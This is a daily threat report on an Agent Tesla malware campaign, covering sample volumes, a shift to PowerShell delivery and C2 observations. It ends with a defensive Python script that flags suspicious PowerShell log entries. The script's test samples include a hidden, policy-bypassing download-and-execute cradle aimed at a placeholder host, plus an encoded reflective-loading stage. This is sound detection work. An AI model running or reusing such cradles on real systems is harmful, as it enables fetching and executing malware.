Agent Tesla - Daily Threat Report

Friday, May 1, 2026

Daily Summary

Agent Tesla sample collection spiked sharply on 2026-05-01 with 80 new samples, 31% above the 7-day average of 61. This represents the highest daily volume observed in the current tracking window, signaling a deliberate campaign push rather than background noise.

New Samples Detected

PowerShell scripts dominate today at 36 samples (45% of total), a marked shift from the typical .exe-led distribution. Executables account for only 15 samples, while JavaScript (14), batch files (3), and DLLs (3) round out the top five. Compressed archives (rar, zip, gz) are minimal at 4 total, suggesting a pivot toward direct script execution over attachment-based delivery. No new C2 servers were observed, indicating reuse of existing infrastructure.

Distribution Methods

The high volume of .ps1 files points to phishing campaigns leveraging email attachments or download links that execute PowerShell in-memory. The presence of .js and .vbs files alongside .bat and .cmd scripts suggests a multi-layered dropper chain, likely using a script to decode and load the final payload. The low archive count may indicate that delivery is via direct script links rather than zipped attachments.

Detection Rate

Based on historical patterns, current Agent Tesla variants exhibit moderate evasion against signature-based engines when delivered via PowerShell. The heavy use of .ps1 files today suggests attackers are exploiting lower detection rates for script-based payloads compared to packed .exe files. SOC teams should verify that behavioral detection rules are tuned for PowerShell injection.

C2 Infrastructure

No new C2 servers were identified on 2026-05-01. This is unusual given the spike in samples and may indicate that attackers are rotating existing C2s or using fast-flux proxies. All 80 new IOCs are sample hashes; no domain or IP intelligence was added.

7-Day Trend

Today’s surge breaks a relatively flat week, where daily counts fluctuated between 45 and 65. The 31% increase above average suggests a coordinated campaign is underway, likely tied to specific lure themes.

Security Analysis

The dominance of PowerShell scripts over executables represents a tactical shift from Agent Tesla’s typical modus operandi. Historically, this family has relied on compiled binaries in archives; today’s volume of .ps1 files suggests attackers are leveraging Living-off-the-Land (LotL) techniques to bypass application allowlisting and static analysis. Defenders should enforce PowerShell execution policy restrictions and monitor for outbound HTTPS traffic to known Agent Tesla C2 patterns (e.g., specific URI paths or user-agent strings).
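As an added example (not code from this report or from abuse.ch), the following Python triage pass scans constructed PowerShell script-block log text (the kind carried in Event ID 4104) for the behaviours the Detection Rate and Security Analysis sections call out: in-memory execution, download cradles, execution-policy bypass and encoded staging. It decodes -EncodedCommand payloads so the second stage of a script dropper chain is scanned as well; the sample blocks, the example.invalid URL and the indicator names are constructed for this example.

```python
import base64
import re

# Behaviours the report flags for PowerShell-delivered Agent Tesla (case-insensitive).
INDICATORS = {
    "encoded_command": r"-(?:EncodedCommand|enc|e)\s+([A-Za-z0-9+/=]{16,})",
    "policy_bypass": r"-(?:ExecutionPolicy|ep)\s+Bypass|-(?:WindowStyle|w)\s+Hidden",
    "download_cradle": r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient",
    "in_memory_exec": r"Invoke-Expression|\bIEX\b",
    "reflective_load": r"\[(?:System\.)?Reflection\.Assembly\]::Load",
    "base64_decode": r"FromBase64String",
}
PATTERNS = {name: re.compile(rx, re.IGNORECASE) for name, rx in INDICATORS.items()}


def decode_encoded_command(blob: str) -> "str | None":
    """-EncodedCommand carries base64 of UTF-16LE text; return the text or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_script_block(text: str, depth: int = 0) -> list:
    """Return indicator names hit by one script block, recursing into -enc payloads."""
    hits = []
    enc = PATTERNS["encoded_command"].search(text)
    if enc:
        hits.append("encoded_command")
        text = text.replace(enc.group(1), "")  # do not pattern-match inside base64 noise
        inner = decode_encoded_command(enc.group(1))
        if inner and depth < 2:  # bounded recursion for nested staging
            hits.extend("decoded:" + h for h in scan_script_block(inner, depth + 1))
    for name, pattern in PATTERNS.items():
        if name != "encoded_command" and pattern.search(text):
            hits.append(name)
    return hits


def triage(blocks: list) -> dict:
    """Block index -> indicators, for every block that hit at least one pattern."""
    return {i: h for i, b in enumerate(blocks) if (h := scan_script_block(b))}


# Constructed script-block texts (not real telemetry); the third is a two-stage chain.
_inner = "$a=[Convert]::FromBase64String('QUJD');[Reflection.Assembly]::Load($a)"
SAMPLE_BLOCKS = [
    r"Get-ChildItem C:\Users\alice\Documents | Measure-Object",
    "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\"",
    "powershell -enc " + base64.b64encode(_inner.encode("utf-16-le")).decode(),
]
```

Running `triage(SAMPLE_BLOCKS)` flags blocks 1 and 2 and leaves the benign directory listing alone; the indicator list per block is what a SOC rule would attach to the alert.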

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
